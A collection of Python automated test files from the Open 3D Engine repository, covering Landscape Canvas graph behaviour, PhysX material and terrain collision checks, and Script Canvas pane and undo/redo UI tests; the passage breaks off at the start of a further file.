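# file as skipped, so a missing ly_test_tools package shows up as a skip rather than a collection error.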
pytest.importorskip('ly_test_tools') import ly_test_tools.environment.file_system as file_system import ly_test_tools._internal.pytest_plugin as internal_plugin import editor_python_test_tools.hydra_test_utils as hydra test_directory = os.path.join(os.path.dirname(__file__), 'EditorScripts') @pytest.mark.parametrize('project', ['AutomatedTesting']) @pytest.mark.parametrize('level', ['tmp_level']) @pytest.mark.usefixtures("automatic_process_killer") @pytest.mark.parametrize("launcher_platform", ['windows_editor']) class TestGraphComponentSync(object): @pytest.fixture(autouse=True) def setup_teardown(self, request, workspace, project, level): def teardown(): file_system.delete([os.path.join(workspace.paths.engine_root(), project, "Levels", level)], True, True) request.addfinalizer(teardown) file_system.delete([os.path.join(workspace.paths.engine_root(), project, "Levels", level)], True, True) @pytest.mark.test_case_id('C4705586') @pytest.mark.BAT @pytest.mark.SUITE_main def test_LandscapeCanvas_SlotConnections_UpdateComponentReferences(self, request, editor, level, launcher_platform): # Skip test if running against Debug build if "debug" in internal_plugin.build_directory: pytest.skip("Does not execute against debug builds.") cfg_args = [level] expected_lines = [ "Landscape Canvas pane is open", "New graph created", "Graph registered with Landscape Canvas", "Random Noise Gradient component Preview Entity property set to Box Shape EntityId", "Dither Gradient Modifier component Inbound Gradient property set to Random Noise Gradient EntityId", "Gradient Mixer component Inbound Gradient extendable property set to Dither Gradient Modifier EntityId", "SlotConnectionsUpdateComponents: result=SUCCESS" ] hydra.launch_and_validate_results(request, test_directory, editor, 'SlotConnections_UpdateComponentReferences.py', expected_lines, cfg_args=cfg_args) @pytest.mark.test_case_id('C22715182') @pytest.mark.SUITE_periodic def test_LandscapeCanvas_GraphUpdates_UpdateComponents(self, request, editor, level, launcher_platform): cfg_args = [level] expected_lines = [ 'Rotation Modifier component was removed from entity', 'BushSpawner entity was deleted', 'Gradient Entity Id reference was properly updated', 'GraphUpdatesUpdateComponents: result=SUCCESS' ] unexpected_lines = [ 'Rotation Modifier component is still present on entity', 'Failed to delete BushSpawner entity', 'Gradient Entity Id was not updated properly' ] hydra.launch_and_validate_results(request, test_directory, editor, 'GraphUpdates_UpdateComponents.py', expected_lines, unexpected_lines=unexpected_lines, cfg_args=cfg_args) @pytest.mark.test_case_id('C22602072') @pytest.mark.SUITE_periodic def test_LandscapeCanvas_ComponentUpdates_UpdateGraph(self, request, editor, level, launcher_platform): cfg_args = [level] expected_lines = [ "LandscapeCanvas entity found", "BushSpawner entity found", "Vegetation Distribution Filter on BushSpawner entity found", "Graph opened", "Distribution Filter node found on graph", "Vegetation Altitude Filter on BushSpawner entity found", "Altitude Filter node found on graph", "Vegetation Distribution Filter removed from BushSpawner entity", "Distribution Filter node was removed from the graph", "New entity successfully added as a child of the BushSpawner entity", "Box Shape on Box entity found", "Box Shape node found on graph", 'ComponentUpdatesUpdateGraph: result=SUCCESS' ] unexpected_lines = [ "Distribution Filter node not found on graph", "Distribution Filter node is still present on the graph", "Altitude Filter node 
not found on graph", "New entity added with an unexpected parent", "Box Shape node not found on graph" ] hydra.launch_and_validate_results(request, test_directory, editor, 'ComponentUpdates_UpdateGraph.py', expected_lines, unexpected_lines=unexpected_lines, cfg_args=cfg_args) @pytest.mark.test_case_id('C15987206') @pytest.mark.SUITE_main def test_LandscapeCanvas_GradientMixer_NodeConstruction(self, request, editor, level, launcher_platform): """ Verifies a Gradient Mixer can be setup in Landscape Canvas and all references are property set. """ # Skip test if running against Debug build if "debug" in internal_plugin.build_directory: pytest.skip("Does not execute against debug builds.") cfg_args = [level] expected_lines = [ 'Landscape Canvas pane is open', 'New graph created', 'Graph registered with Landscape Canvas', 'Perlin Noise Gradient component Preview Entity property set to Box Shape EntityId', 'Gradient Mixer component Inbound Gradient extendable property set to Perlin Noise Gradient EntityId', 'Gradient Mixer component Inbound Gradient extendable property set to FastNoise Gradient EntityId', 'Configuration|Layers|[0]|Operation set to 0', 'Configuration|Layers|[1]|Operation set to 6', 'GradientMixerNodeConstruction: result=SUCCESS' ] hydra.launch_and_validate_results(request, test_directory, editor, 'GradientMixer_NodeConstruction.py', expected_lines, cfg_args=cfg_args) @pytest.mark.test_case_id('C21333743') @pytest.mark.SUITE_periodic def test_LandscapeCanvas_LayerBlender_NodeConstruction(self, request, editor, level, launcher_platform): """ Verifies a Layer Blender can be setup in Landscape Canvas and all references are property set. """ cfg_args = [level] expected_lines = [ 'Landscape Canvas pane is open', 'New graph created', 'Graph registered with Landscape Canvas', 'Vegetation Layer Blender component Vegetation Areas[0] property set to Vegetation Layer Spawner EntityId', 'Vegetation Layer Blender component Vegetation Areas[1] property set to Vegetation Layer Blocker EntityId', 'LayerBlenderNodeConstruction: result=SUCCESS' ] hydra.launch_and_validate_results(request, test_directory, editor, 'LayerBlender_NodeConstruction.py', expected_lines, cfg_args=cfg_args) ``` #### File: PythonTests/physics/C15096740_Material_LibraryUpdatedCorrectly.py ```python class Tests(): create_entity = ("Entity created successfully", "Failed to create Entity") add_physx_component = ("PhysX Component added successfully", "Failed to add PhysX Component") override_default_library = ("Material library overrided successfully", "Failed to override material library") update_to_default_library = ("Library updated to default", "Failed to update library to default") new_library_updated = ("New library updated successfully", "Failed to add new library") # fmt: on def C15096740_Material_LibraryUpdatedCorrectly(): """ Summary: Load level with Entity having PhysX Component. Override the material library to be the same one as the default material library. Change the default material library into another one. Expected Behavior: The material library gets updated correctly when the default material is changed. Test Steps: 1) Load the level 2) Create new Entity with PhysX Character Controller 3) Override the material library to be the same one as the default material library 4) Switch it back again to the default material library. 5) Change the default material library into another one. 
6) Close the editor Note: - This test file must be called from the Open 3D Engine Editor command terminal - Any passed and failed tests are written to the Editor.log file. Parsing the file or running a log_monitor are required to observe the test results. :return: None """ # Built-in Imports import os import ImportPathHelper as imports imports.init() # Helper file Imports from editor_python_test_tools.editor_entity_utils import EditorEntity from editor_python_test_tools.utils import Report from editor_python_test_tools.utils import TestHelper as helper from asset_utils import Asset # Open 3D Engine Imports import azlmbr.asset as azasset # Constants library_property_path = "Configuration|Physics Material|Library" default_material_path = "surfacetypemateriallibrary.physmaterial" new_material_path = os.path.join("physicssurfaces", "default_phys_materials.physmaterial") helper.init_idle() # 1) Load the level helper.open_level("Physics", "Base") # 2) Create new Entity with PhysX Character Controller test_entity = EditorEntity.create_editor_entity("TestEntity") Report.result(Tests.create_entity, test_entity.id.IsValid()) test_component = test_entity.add_component("PhysX Character Controller") Report.result(Tests.add_physx_component, test_entity.has_component("PhysX Character Controller")) # 3) Override the material library to be the same one as the default material library default_asset = Asset.find_asset_by_path(default_material_path) test_component.set_component_property_value(library_property_path, default_asset.id) default_asset.id = test_component.get_component_property_value(library_property_path) Report.result(Tests.override_default_library, default_asset.get_path() == default_material_path) # 4) Switch it back again to the default material library. test_component.set_component_property_value(library_property_path, azasset.AssetId()) Report.result( Tests.update_to_default_library, test_component.get_component_property_value(library_property_path) == azasset.AssetId(), ) # 5) Change the default material library into another one. 
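    # Note: the path comparison at the end of this step normalizes os.sep to '/', since Asset.get_path is
    # expected to return forward-slash separated paths (hence the replace(os.sep, '/') below).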
new_asset = Asset.find_asset_by_path(new_material_path) test_component.set_component_property_value(library_property_path, new_asset.id) new_asset.id = test_component.get_component_property_value(library_property_path) Report.result(Tests.new_library_updated, new_asset.get_path() == new_material_path.replace(os.sep, '/')) if __name__ == "__main__": import ImportPathHelper as imports imports.init() from editor_python_test_tools.utils import Report Report.start_test(C15096740_Material_LibraryUpdatedCorrectly) ``` #### File: PythonTests/physics/C15563573_Material_AddModifyDeleteOnCharacterController.py ```python class Tests: enter_game_mode_0 = ("Test 0) Entered game mode", "Test 0) Failed to enter game mode") find_default_controller_0 = ("Test 0) The default controller entity was found", "Test 0) The default controller entity was not found") find_modified_controller_0 = ("Test 0) The modified controller entity was found", "Test 0) The modified controller entity was not found") find_on_default_box_0 = ("Test 0) Box on default was found", "Test 0) Box on default was not found") find_on_modified_box_0 = ("Test 0) Box on modified was found", "Test 0) Box on modified was not found") boxes_moved_0 = ("Test 0) All boxes moved", "Test 0) Boxes failed to move") boxes_at_rest_0 = ("Test 0) All boxes came to rest", "Test 0) Boxes failed to come to rest") exit_game_mode_0 = ("Test 0) Exited game mode", "Test 0) Failed to exit game mode") default_less_than_modified = ("Test 0) Modified box traveled farther than default", "Test 0) Modified box did not travel farther than default") enter_game_mode_1 = ("Test 1) Entered game mode", "Test 1) Failed to enter game mode") find_default_controller_1 = ("Test 1) The default controller entity was found", "Test 1) The default controller entity was not found") find_modified_controller_1 = ("Test 1) The modified controller entity was found", "Test 1) The modified controller entity was not found") find_on_default_box_1 = ("Test 1) Box on default was found", "Test 1) Box on default was not found") find_on_modified_box_1 = ("Test 1) Box on modified was found", "Test 1) Box on modified was not found") boxes_moved_1 = ("Test 1) All boxes moved", "Test 1) Boxes failed to move") boxes_at_rest_1 = ("Test 1) All boxes came to rest", "Test 1) Boxes failed to come to rest") exit_game_mode_1 = ("Test 1) Exited game mode", "Test 1) Failed to exit game mode") modified_less_than_default = ("Test 1) Modified box traveled less than default", "Test 1) Modified box traveled farther than default") enter_game_mode_2 = ("Test 2) Entered game mode", "Test 2) Failed to enter game mode") find_default_controller_2 = ("Test 2) The default controller entity was found", "Test 2) The default controller entity was not found") find_modified_controller_2 = ("Test 2) The modified controller entity was found", "Test 2) The modified controller entity was not found") find_on_default_box_2 = ("Test 2) Box on default was found", "Test 2) Box on default was not found") find_on_modified_box_2 = ("Test 2) Box on modified was found", "Test 2) Box on modified was not found") boxes_moved_2 = ("Test 2) All boxes moved", "Test 2) Boxes failed to move") boxes_at_rest_2 = ("Test 2) All boxes came to rest", "Test 2) Boxes failed to come to rest") exit_game_mode_2 = ("Test 2) Exited game mode", "Test 2) Failed to exit game mode") default_equals_modified = ("Test 2) Modified and Default boxes traveled the same distance", "Test 2) Modified and Default boxes did not travel the same distance") # fmt: on def 
C15563573_Material_AddModifyDeleteOnCharacterController(): """ Summary: Runs an automated test to verify that any change (Add/Delete/Modify) made to the material surface in the material library reflects immediately in the PhysX Character Controller Level Description: There are two groups of entities, one for "modified" and one for "default". Each group has two entities: one box, with PhysX Rigid Body and PhysX Box Collider one character controller, with PhysX Character Controller - configured as a box shape The box entity for each group sits on top of its respective character controller entity. The boxes are identical and have the default physX material assigned. The character controller "default_controller" is assigned the default physx material. A new material library was created with 1 material, called "Modified", this is assigned to "modified_controller" dynamic friction: 0.25 static friction: 0.5 restitution: 0.5 Expected behavior: For every iteration this test applies a force impulse in the X direction to each box. The boxes save their traveled distances each iteration, to verify different behavior between each setup. First the test verifies the two controllers are assigned differing materials, without changing anything. With a lower dynamic friction coefficient, the box 'on_modified' should travel a longer distance than 'on_default' Next, the test modifies the dynamic friction value for 'modified_controller' (from 0.25 to 0.75). 'on_modified' should travel a shorter distance than it did in the previous test, and less than 'default' Finally, we delete the 'modified' material entirely. The box 'on_modified' should then behave as 'on_default' box, and travel the same distance. Test Steps: 1) Open level 2) Collect basis values without modifying anything 2.1) Enter game mode 2.2) Find entities 2.3) Push the boxes and wait for them to come to rest 2.4) Exit game mode 3) Modify the dynamic friction value of 'modified' 3.1 - 3.4) <same as above> 4) Delete 'modified's' material 4.1 - 4.4) <same as above> 5) Close editor Notes: - As of 20/02/2020, we do not have any capabilities to automate the UI part of the test case. Nor can we 'Add' any new mesh surface in a material library by modifying the ".physmaterial" file as it requires a UUID. Hence, in order to validate that the modification/deletion of mesh surfaces from material library are reflected in the allocated material in Character Controller, we will verify the change in behaviour of the Character Controller occurring due to change in mesh surfaces, during the game mode. - This test file must be called from the Open 3D Engine Editor command terminal - Any passed and failed tests are written to the Editor.log file. Parsing the file or running a log_monitor are required to observe the test results. 
:return: None """ import os import sys import ImportPathHelper as imports imports.init() import azlmbr.legacy.general as general import azlmbr.math as lymath from Physmaterial_Editor import Physmaterial_Editor from AddModifyDelete_Utils import Box from editor_python_test_tools.utils import Report from editor_python_test_tools.utils import TestHelper as helper FORCE_IMPULSE = lymath.Vector3(5.0, 0.0, 0.0) TIMEOUT = 3.0 DISTANCE_TOLERANCE = 0.001 def get_test(test_name): return Tests.__dict__[test_name] def run_test(test_number): # x.1) Enter game mode helper.enter_game_mode(get_test("enter_game_mode_{}".format(test_number))) # x.2) Find entities default_controller_id = general.find_game_entity("default_controller") modified_controller_id = general.find_game_entity("modified_controller") Report.result(get_test("find_default_controller_{}".format(test_number)), default_controller_id.IsValid()) Report.result(get_test("find_modified_controller_{}".format(test_number)), modified_controller_id.IsValid()) Report.result(get_test("find_on_default_box_{}".format(test_number)), default_box.find()) Report.result(get_test("find_on_modified_box_{}".format(test_number)), modified_box.find()) # x.3) Push the boxes and wait for them to come to rest default_box.push(FORCE_IMPULSE) modified_box.push(FORCE_IMPULSE) def boxes_are_moving(): return not default_box.is_stationary() and not modified_box.is_stationary() def boxes_are_stationary(): return default_box.is_stationary() and modified_box.is_stationary() Report.result( get_test("boxes_moved_{}".format(test_number)), helper.wait_for_condition(boxes_are_moving, TIMEOUT), ) Report.result( get_test("boxes_at_rest_{}".format(test_number)), helper.wait_for_condition(boxes_are_stationary, TIMEOUT), ) default_box.distances.append(default_box.position.GetDistance(default_box.start_position)) modified_box.distances.append(modified_box.position.GetDistance(modified_box.start_position)) # x.4) Exit game mode helper.exit_game_mode(get_test("exit_game_mode_{}".format(test_number))) # 1) Open level and enter game mode helper.init_idle() helper.open_level("Physics", "C15563573_Material_AddModifyDeleteOnCharacterController") # Setup persisting entities default_box = Box("on_default") modified_box = Box("on_modified") # 2) Collect basis values without modifying anything run_test(0) # While sitting on a character controller with friction of 0.25, 'on_modified' should travel farther than 'default' Report.result(Tests.default_less_than_modified, default_box.distances[0] < modified_box.distances[0]) # 3) Modify the dynamic friction value of 'modified' material_editor = Physmaterial_Editor("c15563573_material_addmodifydeleteoncharactercontroller.physmaterial") material_editor.modify_material("Modified", "DynamicFriction", 0.75) material_editor.save_changes() run_test(1) # With greater friction, 'on_modified' should now travel a shorter distance than it did in the previous test. 
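    # The check below compares against the default box's distance from the first run (distances[0]); the
    # default controller's material is never modified, so that first-run distance serves as the baseline.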
Report.result(Tests.modified_less_than_default, default_box.distances[0] > modified_box.distances[1]) # 4) Delete 'modified's material material_editor.delete_material("Modified") material_editor.save_changes() run_test(2) Report.result( Tests.default_equals_modified, lymath.Math_IsClose(default_box.distances[2], modified_box.distances[2], DISTANCE_TOLERANCE), ) if __name__ == "__main__": import ImportPathHelper as imports imports.init() from editor_python_test_tools.utils import Report Report.start_test(C15563573_Material_AddModifyDeleteOnCharacterController) ``` #### File: PythonTests/physics/C3510642_Terrain_NotCollideWithTerrain.py ```python class Tests(): enter_game_mode = ("Entered game mode", "Failed to enter game mode") find_box = ("Box entity found", "Box entity not found") find_bumper = ("Bumper box found", "Bumper box not found") box_above_terrain = ("The tester box is above terrain", "The test box is not higher than the terrain") bumper_below_terrain = ("The bumper is below terrain", "The bumper is not lower than the terrain") gravity_works = ("Box fell", "Box did not fall") falls_below_terrain_height = ("Box is below terrain", "Box did not fall below terrain before timeout") collision_underground = ("Box collided underground", "Box did not collide underground before timeout") exit_game_mode = ("Exited game mode", "Couldn't exit game mode") # fmt: on def C3510642_Terrain_NotCollideWithTerrain(): """ Summary: Runs an automated test to ensure that when no PhysX Terrain component is added, PhysX objects will not collide with terrain. Level Description: Box (entity) - suspended over the terrain with gravity enabled; contains a box mesh, PhysX Collider (Box shape), and PhysX RigidBody Bumper (entity) - suspended under the terrain with gravity disabled; contains box mesh, PhysX Collider (Box shape), and PhysX RigidBody Expected Behavior: When game mode is entered, the Box entity will experience gravity and fall toward the terrain. Since there is no PhysX Terrain component in the level, it should fall through the terrain. Once it passes through the terrain, it will collide with the Bumper entity in order to prove that it has passed the terrain. Test Steps: 1) Open level 2) Enter game mode 3) Find the entities 4) Get the starting z position of the boxes 5) Check and report that the entities are at the correct heights 6) Check that the gravity works and the box falls 7) Check that the box hits the trigger and is below the terrain 8) Exit game mode 9) Close the editor Note: - This test file must be called from the Open 3D Engine Editor command terminal - Any passed and failed tests are written to the Editor.log file. Parsing the file or running a log_monitor are required to observe the test results. 
:return: None """ import os import sys import ImportPathHelper as imports imports.init() import azlmbr.legacy.general as general import azlmbr.bus from editor_python_test_tools.utils import Report from editor_python_test_tools.utils import TestHelper as helper # Constants TIMEOUT = 2.0 TERRAIN_HEIGHT = 32.0 # Default height of the terrain MIN_BELOW_TERRAIN = 0.5 # Minimum height below terrain the box must be in order to be 'under' it helper.init_idle() # 1) Open level helper.open_level("Physics", "C3510642_Terrain_NotCollideWithTerrain") # 2) Enter game mode helper.enter_game_mode(Tests.enter_game_mode) # 3) Find the entities box_id = general.find_game_entity("Box") Report.critical_result(Tests.find_box, box_id.IsValid()) bumper_id = general.find_game_entity("Bumper") Report.critical_result(Tests.find_bumper, bumper_id.IsValid()) # 4) Get the starting z position of the boxes class Box: """ Class to hold boolean values for test checks. Attributes: start_position_z: The initial z position of the box position_z : The z position of the box fell : When the box falls any distance below its original position, the value should be set True below_terrain : When the box falls below the specified terrain height, the value should be set True """ start_position_z = None position_z = None fell = False below_terrain = False Box.start_position_z = azlmbr.components.TransformBus(azlmbr.bus.Event, "GetWorldZ", box_id) bumper_start_z = azlmbr.components.TransformBus(azlmbr.bus.Event, "GetWorldZ", bumper_id) # 5) Check that the test box is above the terrain and the bumper box is below terrain Report.info("Terrain Height: {}".format(TERRAIN_HEIGHT)) Report.info("Box start height: {}".format(Box.start_position_z)) Report.result(Tests.box_above_terrain, Box.start_position_z > TERRAIN_HEIGHT) Report.info("Bumper start height: {}".format(bumper_start_z)) Report.result(Tests.bumper_below_terrain, bumper_start_z < TERRAIN_HEIGHT) # 6) Check that the gravity works and the box falls def box_fell(): if not Box.fell: Box.position_z = azlmbr.components.TransformBus(azlmbr.bus.Event, "GetWorldZ", box_id) if Box.position_z < Box.start_position_z: Report.info("Box position is now lower than the starting position") Box.fell = True return Box.fell helper.wait_for_condition(box_fell, TIMEOUT) Report.result(Tests.gravity_works, Box.fell) # 7) Check that the box hits the trigger and is below the terrain # Setup for collision check class BumperTriggerEntered: value = False def on_collision_begin(args): other_id = args[0] if other_id.Equal(bumper_id): BumperTriggerEntered.value = True handler = azlmbr.physics.CollisionNotificationBusHandler() handler.connect(box_id) handler.add_callback("OnCollisionBegin", on_collision_begin) def box_below_terrain(): if not Box.below_terrain: Box.position_z = azlmbr.components.TransformBus(azlmbr.bus.Event, "GetWorldZ", box_id) if Box.position_z < (TERRAIN_HEIGHT - MIN_BELOW_TERRAIN): Report.info("Box position is now below the terrain") Box.below_terrain = True return Box.below_terrain def box_below_and_trigger_entered(): return box_below_terrain() and BumperTriggerEntered.value helper.wait_for_condition(box_below_and_trigger_entered, TIMEOUT) Report.result(Tests.collision_underground, BumperTriggerEntered.value) Report.result(Tests.falls_below_terrain_height, Box.below_terrain) # 8) Exit game mode helper.exit_game_mode(Tests.exit_game_mode) if __name__ == "__main__": import ImportPathHelper as imports imports.init() from editor_python_test_tools.utils import Report 
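    # Report.start_test runs the test function defined above; pass/fail results
    # land in Editor.log, as noted in the docstring.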
Report.start_test(C3510642_Terrain_NotCollideWithTerrain) ``` #### File: PythonTests/scripting/EditMenu_Default_UndoRedo.py ```python class Tests(): variable_created = ("New variable created", "New variable not created") undo_worked = ("Undo action working", "Undo action did not work") redo_worked = ("Redo action working", "Redo action did not work") # fmt: on def EditMenu_Default_UndoRedo(): """ Summary: Edit > Undo undoes the last action Edit > Redo redoes the last undone action We create a new variable in variable manager, undo and verify if variable is removed, redo it and verify if the variable is created again. Expected Behavior: The last action is undone upon selecting Undo. The last undone action is redone upon selecting Redo. Test Steps: 1) Open Script Canvas window (Tools > Script Canvas) 2) Get the SC window object 3) Open Variable Manager if not opened already 4) Create Graph 5) Create new variable 6) Verify if the variable is created initially 7) Trigger Undo action and verify if variable is removed in Variable Manager 8) Trigger Redo action and verify if variable is re-added in Variable Manager 9) Close SC window Note: - This test file must be called from the Open 3D Engine Editor command terminal - Any passed and failed tests are written to the Editor.log file. Parsing the file or running a log_monitor are required to observe the test results. :return: None """ from PySide2 import QtWidgets, QtCore import pyside_utils import azlmbr.legacy.general as general # 1) Open Script Canvas window general.idle_enable(True) general.open_pane("Script Canvas") # 2) Get the SC window object editor_window = pyside_utils.get_editor_main_window() sc = editor_window.findChild(QtWidgets.QDockWidget, "Script Canvas") # 3) Open Variable Manager if not opened already if sc.findChild(QtWidgets.QDockWidget, "VariableManager") is None: action = pyside_utils.find_child_by_pattern(sc, {"text": "Variable Manager", "type": QtWidgets.QAction}) action.trigger() variable_manager = sc.findChild(QtWidgets.QDockWidget, "VariableManager") # 4) Create Graph action = pyside_utils.find_child_by_pattern(sc, {"objectName": "action_New_Script", "type": QtWidgets.QAction}) action.trigger() # 5) Create new variable add_button = variable_manager.findChild(QtWidgets.QPushButton, "addButton") add_button.click() # Click on Create Variable button # Select variable type table_view = variable_manager.findChild(QtWidgets.QTableView, "variablePalette") model_index = pyside_utils.find_child_by_pattern(table_view, "Boolean") # Click on it to create variable pyside_utils.item_view_index_mouse_click(table_view, model_index) # 6) Verify if the variable is created initially graph_vars = variable_manager.findChild(QtWidgets.QTableView, "graphVariables") result = graph_vars.model().rowCount(QtCore.QModelIndex()) == 1 # since we added 1 variable, rowcount=1 Report.result(Tests.variable_created, result) # 7) Trigger Undo action and verify if variable is removed in Variable Manager action = sc.findChild(QtWidgets.QAction, "action_Undo") action.trigger() result = graph_vars.model().rowCount(QtCore.QModelIndex()) == 0 # since we triggered undo, rowcount=0 Report.result(Tests.undo_worked, result) # 8) Trigger Redo action and verify if variable is readded in Variable Manager action = sc.findChild(QtWidgets.QAction, "action_Redo") action.trigger() result = ( graph_vars.model().rowCount(QtCore.QModelIndex()) == 1 ) # since action is redone 1 variable is readded, rowcount=1 Report.result(Tests.redo_worked, result) # 9) Close SC window 
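    # close_pane tears down the Script Canvas window that step 1 opened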
general.close_pane("Script Canvas") if __name__ == "__main__": import ImportPathHelper as imports imports.init() from utils import Report Report.start_test(EditMenu_Default_UndoRedo) ``` #### File: PythonTests/scripting/Pane_Default_RetainOnSCRestart.py ```python class Tests(): relaunch_sc = ("Script Canvas window is relaunched", "Failed to relaunch Script Canvas window") test_panes_visible = ("All the test panes are opened", "Failed to open one or more test panes") close_pane_1 = ("Test pane 1 is closed", "Failed to close test pane 1") visibility_retained = ("Test pane retained its visibility on SC restart", "Failed to retain visibility of test pane on SC restart") resize_pane_3 = ("Test pane 3 resized successfully", "Failed to resize Test pane 3") size_retained = ("Test pane retained its size on SC restart", "Failed to retain size of test pane on SC restart") location_changed = ("Location of test pane 2 changed successfully", "Failed to change location of test pane 2") location_retained = ("Test pane retained its location on SC restart", "Failed to retain location of test pane on SC restart") # fmt: on def Pane_Default_RetainOnSCRestart(): """ Summary: The Script Canvas window is opened to verify if Script canvas panes can retain its visibility, size and location upon ScriptCanvas restart. Expected Behavior: The ScriptCanvas pane retain it's visibility, size and location upon ScriptCanvas restart. Test Steps: 1) Open Script Canvas window (Tools > Script Canvas) 2) Make sure test panes are open and visible 3) Close test pane 1 4) Change dock location of test pane 2 5) Resize test pane 3 6) Relaunch Script Canvas 7) Verify if test pane 1 retain its visibility 8) Verify if location of test pane 2 is retained 9) Verify if size of test pane 3 is retained 10) Restore default layout and close SC window Note: - This test file must be called from the Open 3D Engine Editor command terminal - Any passed and failed tests are written to the Editor.log file. Parsing the file or running a log_monitor are required to observe the test results. 
:return: None """ # Pyside imports from PySide2 import QtCore, QtWidgets from PySide2.QtCore import Qt # Helper imports from utils import Report from utils import TestHelper as helper import pyside_utils # Open 3D Engine Imports import azlmbr.legacy.general as general TEST_PANE_1 = "NodePalette" # test visibility TEST_PANE_2 = "VariableManager" # test location TEST_PANE_3 = "NodeInspector" # test size SCALE_INT = 10 # Random resize scale integer DOCKAREA = Qt.TopDockWidgetArea # Preferred top area since no widget is docked on top def click_menu_option(window, option_text): action = pyside_utils.find_child_by_pattern(window, {"text": option_text, "type": QtWidgets.QAction}) action.trigger() def find_pane(window, pane_name): return window.findChild(QtWidgets.QDockWidget, pane_name) # Test starts here general.idle_enable(True) # 1) Open Script Canvas window (Tools > Script Canvas) general.open_pane("Script Canvas") helper.wait_for_condition(lambda: general.is_pane_visible("Script Canvas"), 3.0) # 2) Make sure test panes are open and visible editor_window = pyside_utils.get_editor_main_window() sc = editor_window.findChild(QtWidgets.QDockWidget, "Script Canvas") click_menu_option(sc, "Restore Default Layout") test_pane_1 = sc.findChild(QtWidgets.QDockWidget, TEST_PANE_1) test_pane_2 = sc.findChild(QtWidgets.QDockWidget, TEST_PANE_2) test_pane_3 = sc.findChild(QtWidgets.QDockWidget, TEST_PANE_3) Report.result( Tests.test_panes_visible, test_pane_1.isVisible() and test_pane_2.isVisible() and test_pane_3.isVisible() ) # Initiate try block here to restore default in finally block try: # 3) Close test pane test_pane_1.close() Report.result(Tests.close_pane_1, not test_pane_1.isVisible()) # 4) Change dock location of test pane 2 sc_main = sc.findChild(QtWidgets.QMainWindow) sc_main.addDockWidget(DOCKAREA, find_pane(sc_main, TEST_PANE_2), QtCore.Qt.Vertical) Report.result(Tests.location_changed, sc_main.dockWidgetArea(find_pane(sc_main, TEST_PANE_2)) == DOCKAREA) # 5) Resize test pane 3 initial_size = test_pane_3.frameSize() test_pane_3.resize(initial_size.width() + SCALE_INT, initial_size.height() + SCALE_INT) new_size = test_pane_3.frameSize() resize_success = ( abs(initial_size.width() - new_size.width()) == abs(initial_size.height() - new_size.height()) == SCALE_INT ) Report.result(Tests.resize_pane_3, resize_success) # 6) Relaunch Script Canvas general.close_pane("Script Canvas") helper.wait_for_condition(lambda: general.is_pane_visible("Script Canvas"), 2.0) general.open_pane("Script Canvas") sc_visible = helper.wait_for_condition(lambda: general.is_pane_visible("Script Canvas"), 5.0) Report.result(Tests.relaunch_sc, sc_visible) # 7) Verify if test pane 1 retain its visibility editor_window = pyside_utils.get_editor_main_window() sc = editor_window.findChild(QtWidgets.QDockWidget, "Script Canvas") Report.result(Tests.visibility_retained, not find_pane(sc, TEST_PANE_1).isVisible()) # 8) Verify if location of test pane 2 is retained sc_main = sc.findChild(QtWidgets.QMainWindow) Report.result(Tests.location_retained, sc_main.dockWidgetArea(find_pane(sc_main, TEST_PANE_2)) == DOCKAREA) # 9) Verify if size of test pane 3 is retained test_pane_3 = sc.findChild(QtWidgets.QDockWidget, TEST_PANE_3) retained_size = test_pane_3.frameSize() retain_success = retained_size != initial_size Report.result(Tests.size_retained, retain_success) finally: # 10) Restore default layout and close SC window general.open_pane("Script Canvas") helper.wait_for_condition(lambda: general.is_pane_visible("Script Canvas"), 
5.0) sc = editor_window.findChild(QtWidgets.QDockWidget, "Script Canvas") click_menu_option(sc, "Restore Default Layout") sc.close() if __name__ == "__main__": import ImportPathHelper as imports imports.init() from utils import Report Report.start_test(Pane_Default_RetainOnSCRestart) ``` #### File: PythonTests/scripting/Pane_HappyPath_DocksProperly.py ```python class Tests(): pane_opened = ("Pane is opened successfully", "Failed to open pane") dock_pane = ("Pane is docked successfully", "Failed to dock Pane into one or more allowed area") # fmt: on def Pane_HappyPath_DocksProperly(): """ Summary: The Script Canvas window is opened to verify if Script canvas panes can be docked into every possible area of Script Canvas main window. (top, bottom, right and left sides of the window) Expected Behavior: The pane docks successfully. Test Steps: 1) Open Script Canvas window (Tools > Script Canvas) 2) Make sure Node Palette pane is opened 3) Dock the Node Palette pane into every possible area of main window 4) Restore default layout 5) Close Script Canvas window Note: - This test file must be called from the Open 3D Engine Editor command terminal - Any passed and failed tests are written to the Editor.log file. Parsing the file or running a log_monitor are required to observe the test results. :return: None """ from editor_python_test_tools.utils import Report from editor_python_test_tools.utils import TestHelper as helper import editor_python_test_tools.pyside_utils as pyside_utils # Open 3D Engine imports import azlmbr.legacy.general as general # Pyside imports from PySide2 import QtCore, QtWidgets from PySide2.QtCore import Qt PANE_WIDGET = "NodePalette" # Chosen most commonly used pane DOCKAREAS = [Qt.TopDockWidgetArea, Qt.BottomDockWidgetArea, Qt.RightDockWidgetArea, Qt.LeftDockWidgetArea] DOCKED = True def click_menu_option(window, option_text): action = pyside_utils.find_child_by_pattern(window, {"text": option_text, "type": QtWidgets.QAction}) action.trigger() def find_pane(window, pane_name): return window.findChild(QtWidgets.QDockWidget, pane_name) # Test starts here general.idle_enable(True) # 1) Open Script Canvas window (Tools > Script Canvas) general.open_pane("Script Canvas") helper.wait_for_condition(lambda: general.is_pane_visible("Script Canvas"), 5.0) # 2) Make sure Node Palette pane is opened editor_window = pyside_utils.get_editor_main_window() sc = editor_window.findChild(QtWidgets.QDockWidget, "Script Canvas") sc_main = sc.findChild(QtWidgets.QMainWindow) pane = find_pane(sc_main, PANE_WIDGET) if not pane.isVisible(): click_menu_option(sc, "Node Palette") pane = find_pane(sc_main, PANE_WIDGET) # New reference Report.result(Tests.pane_opened, pane.isVisible()) # 3) Dock the Node Palette pane into every possible area of main window for area in DOCKAREAS: sc_main.addDockWidget(area, find_pane(sc_main, PANE_WIDGET), QtCore.Qt.Vertical) if not (sc_main.dockWidgetArea(find_pane(sc_main, PANE_WIDGET)) == area): Report.info(f"Failed to dock into {str(area)}") DOCKED = DOCKED and (sc_main.dockWidgetArea(find_pane(sc_main, PANE_WIDGET)) == area) Report.result(Tests.dock_pane, DOCKED) # 4) Restore default layout # Need this step to restore to default in case of test failure click_menu_option(sc, "Restore Default Layout") # 5) Close Script Canvas window sc.close() if __name__ == "__main__": import ImportPathHelper as imports imports.init() from editor_python_test_tools.utils import Report Report.start_test(Pane_HappyPath_DocksProperly) ``` #### File: o3de/cmake/mocfix.py ```python from 
